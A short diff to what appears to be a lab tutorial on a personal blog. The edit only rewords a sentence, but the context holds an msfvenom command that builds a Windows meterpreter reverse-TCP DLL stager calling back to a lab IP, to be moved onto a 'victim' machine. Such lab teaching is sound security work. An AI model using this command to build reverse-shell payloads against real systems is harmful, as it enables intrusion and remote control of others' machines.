faanross/faanross.github.io/content/posts/course01.md

 **Great now let's generate our stager and transfer it over to the victim.**
 1. On our Kali VM open your terminal.
-2. We are going to run the command below, which will generate a payload for us using `msfvenom` (a standalone app that is part of the Metasploit framework).
+2. We are going to run the command below, which will generate a payload for us using `msfvenom`, a standalone app that is part of the Metasploit framework.
 ```
 sudo msfvenom -p windows/meterpreter/reverse_tcp Lhost=192.168.230.155 Lport=88 -f dll > /home/hacker/Desktop/evil.dll
 ```